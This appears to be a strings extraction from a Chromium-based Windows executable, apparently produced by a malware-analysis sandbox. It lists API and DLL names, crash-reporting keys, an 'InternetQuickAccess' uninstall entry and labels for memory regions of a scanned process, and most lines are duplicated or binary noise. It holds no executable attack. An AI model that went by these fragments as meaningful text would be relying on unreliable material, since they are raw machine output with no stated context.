c:\projects\chromium_clean\src\sandbox\win\src\interception.cc

CreateNamedPipeW

CreateNamedPipeW

NtCreateKey

NtCreateKey

NtOpenKey

NtOpenKey

NtOpenKeyEx

NtOpenKeyEx

MetricsReportingEnabled

MetricsReportingEnabled

full-memory-crash-report

full-memory-crash-report

CHROME_VERSION

CHROME_VERSION

CHROME_HEADLESS

CHROME_HEADLESS

CHROME_METRO_CONNECTED

CHROME_METRO_CONNECTED

CHROME_CRASHED

CHROME_CRASHED

CHROME_RESTART

CHROME_RESTART

chrome.googleechotest.com

chrome.googleechotest.com

CHROME_BREAKPAD_PIPE_NAME

CHROME_BREAKPAD_PIPE_NAME

c:\projects\chromium_clean\src\components\crash\app\breakpad_win.cc

c:\projects\chromium_clean\src\components\crash\app\breakpad_win.cc

NTDLL.DLL

NTDLL.DLL

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

GetProcessWindowStation

GetProcessWindowStation

operator

operator

c:\projects\chromium_clean\src\out\Release\initialexe\chrome.exe.pdb

c:\projects\chromium_clean\src\out\Release\initialexe\chrome.exe.pdb

chrome.exe

chrome.exe

ClearBreakpadPipeEnvironmentVariable

ClearBreakpadPipeEnvironmentVariable

ClearCrashKeyValueImpl

ClearCrashKeyValueImpl

SetCrashKeyValueImpl

SetCrashKeyValueImpl

SignalChromeElf

SignalChromeElf

chrome_elf.dll

chrome_elf.dll

VERSION.dll

VERSION.dll

WINMM.dll

WINMM.dll

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegEnumKeyExW

RegEnumKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

ADVAPI32.dll

ADVAPI32.dll

CloseWindowStation

CloseWindowStation

CreateWindowStationW

CreateWindowStationW

SetProcessWindowStation

SetProcessWindowStation

USER32.dll

USER32.dll

GetProcessHeap

GetProcessHeap

GetWindowsDirectoryW

GetWindowsDirectoryW

CreateIoCompletionPort

CreateIoCompletionPort

GetProcessHandleCount

GetProcessHandleCount

KERNEL32.dll

KERNEL32.dll

USERENV.dll

USERENV.dll

WTSAPI32.dll

WTSAPI32.dll

GetCPInfo

GetCPInfo

SetNamedPipeHandleState

SetNamedPipeHandleState

TransactNamedPipe

TransactNamedPipe

WaitNamedPipeW

WaitNamedPipeW

zcÁ

zcÁ

4P5F5^576W6m6[7u7

4P5F5^576W6m6[7u7

5.64686

5.64686

4,50585

4,50585

chrome_watcher.dll

chrome_watcher.dll

ntdll.dll

ntdll.dll

chrome.dll

chrome.dll

chrome_child.dll

chrome_child.dll

metro_driver.dll

metro_driver.dll

{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}

{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}

{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}

{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}

Browse the web fast

Browse the web fast

Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess

Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess

-chrome

-chrome

-chromeframe

-chromeframe

WebAccessible

WebAccessible

{8BA986DA-5100-405E-AA35-86F34A02ACBF}

{8BA986DA-5100-405E-AA35-86F34A02ACBF}

DGoogle Chrome Frame

DGoogle Chrome Frame

Google\Chrome Frame

Google\Chrome Frame

Chrome in a Frame.

Chrome in a Frame.

Uninstall Chrome Frame

Uninstall Chrome Frame

Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame

Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame

Ndebug.log

Ndebug.log

.\debug.log

.\debug.log

\StringFileInfo\xx\%ls

\StringFileInfo\xx\%ls

Chrome_MessageWindow

Chrome_MessageWindow

HKEY_CLASSES_ROOT

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_TEXT

HKEY_PERFORMANCE_TEXT

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_NLSTEXT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_DYN_DATA

pipe\

pipe\

Bkernel32.dll

Bkernel32.dll

kernelbase.dll

kernelbase.dll

\Sessions\%d\AppContainerNamedObjects\%ls

\Sessions\%d\AppContainerNamedObjects\%ls

eKey

eKey

Ckernel32.dll

Ckernel32.dll

gdi32.dll

gdi32.dll

xntdll.dll

xntdll.dll

wow_helper.exe"

wow_helper.exe"

shell32.dll

shell32.dll

gcswf32.dll

gcswf32.dll

Crash Reports

Crash Reports

script.log

script.log

resources.pak

resources.pak

chrome

chrome

pepflashplayer.dll

pepflashplayer.dll

${windows}

${windows}

\\.\pipe\GoogleCrashServices\

\\.\pipe\GoogleCrashServices\

\\.\pipe\ChromeCrashServices

\\.\pipe\ChromeCrashServices

error %u

error %u

hunspecified-crash-key

hunspecified-crash-key

Dmscoree.dll

Dmscoree.dll

ADVAPI32.DLL

ADVAPI32.DLL

- floating point support not loaded

- floating point support not loaded

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

USER32.DLL

USER32.DLL

portuguese-brazilian

portuguese-brazilian

dbghelp.dll

dbghelp.dll

rpcrt4.dll

rpcrt4.dll

%s\%s.dmp

%s\%s.dmp

x-x-x-xx-xxxxxx

x-x-x-xx-xxxxxx

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe

45.0.2433.0

45.0.2433.0

chrome_exe

chrome_exe

avg23.exe_1836_rwx_03EF0000_00005000:

{"%u^

{"%u^

k"%u^

k"%u^

["%u^

["%u^

;"%u^

;"%u^

s %u^

s %u^

c %u^

c %u^

S %u^

S %u^

3 %u^

3 %u^

avg23.exe_1836_rwx_03F10000_00010000:

%u;F u

%u;F u

rO%u;

rO%u;

oH%uP

oH%uP

q%u;F u

q%u;F u

o%u;F u

o%u;F u

M*%uP

M*%uP

7*%uP

7*%uP

^%u;F u

^%u;F u

K%u;F u

K%u;F u

"?%u;F4u

"?%u;F4u